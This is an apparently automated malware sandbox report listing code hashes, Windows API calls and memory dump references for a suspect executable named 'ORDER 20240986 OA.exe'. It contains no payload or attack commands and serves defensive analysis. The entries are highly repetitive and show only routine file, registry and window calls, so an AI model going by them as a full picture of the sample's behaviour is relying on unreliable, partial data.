                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Enum$CloseValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 397863658-0
                                                                                                                                                  • Opcode ID: 56344988bb6116f92104e687caff177940e4dcbfe6d483e74d802acf9f516b16
                                                                                                                                                  • Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
                                                                                                                                                  • Opcode Fuzzy Hash: 56344988bb6116f92104e687caff177940e4dcbfe6d483e74d802acf9f516b16
                                                                                                                                                  • Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2336495745.000000006FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FBB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2336461963.000000006FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336529386.000000006FBB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336658892.000000006FBB5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6fbb0000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1948546556-0
                                                                                                                                                  • Opcode ID: 679bbc20cba08b12891aeb5d61993a45c817104304ddd5503796e98cbcaf6e67
                                                                                                                                                  • Instruction ID: f7aed9545effcc73a6eafb819e9901feac37a12c9b5bb170ca2b1f67bea57409
                                                                                                                                                  • Opcode Fuzzy Hash: 679bbc20cba08b12891aeb5d61993a45c817104304ddd5503796e98cbcaf6e67
                                                                                                                                                  • Instruction Fuzzy Hash: 9B516D76508684DFDF26DFA5E985BAD37B5FB45328F50482ED804CB290CF38A4A2CB51
                                                                                                                                                  APIs
                                                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseQueryValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3356406503-0
                                                                                                                                                  • Opcode ID: 2817fdc1b453530556b1233eeb78b93eab19bad1ba8c502dca76499b0c80bb5e
                                                                                                                                                  • Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
                                                                                                                                                  • Opcode Fuzzy Hash: 2817fdc1b453530556b1233eeb78b93eab19bad1ba8c502dca76499b0c80bb5e
                                                                                                                                                  • Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A
                                                                                                                                                  APIs
                                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                  • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                                                                                  • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                                                                                                                                  • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                                                                                  • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                                                                                                                                  APIs
                                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$EnableShow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1136574915-0
                                                                                                                                                  • Opcode ID: a5279d58909cb0200b7873d2906f67189e0a8c6f713d0d692494d0366452260b
                                                                                                                                                  • Instruction ID: ed958cdb0af940290ad8e224458c39a91d35accb7d2f19645d781aa9a2f92111
                                                                                                                                                  • Opcode Fuzzy Hash: a5279d58909cb0200b7873d2906f67189e0a8c6f713d0d692494d0366452260b
                                                                                                                                                  • Instruction Fuzzy Hash: ECE01A72E082008FE764ABA5AA495AD77B4EB91325B20847FE211F11D1DE7858418F6A
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                                                                                    • Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                                                                                    • Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
                                                                                                                                                    • Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2547128583-0
                                                                                                                                                  • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                                  • Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
                                                                                                                                                  • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                                  • Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ORDER 20240986 OA.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                                  • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                  • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                                  • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                  • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                  • Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
                                                                                                                                                  • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                  • Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98
                                                                                                                                                  APIs
                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
                                                                                                                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1375471231-0
                                                                                                                                                  • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                  • Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
                                                                                                                                                  • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                  • Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D
                                                                                                                                                  APIs
                                                                                                                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                  • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                  • Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
                                                                                                                                                  • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                  • Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674
                                                                                                                                                  APIs
                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                  • Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
                                                                                                                                                  • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                  • Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4
                                                                                                                                                  APIs
                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
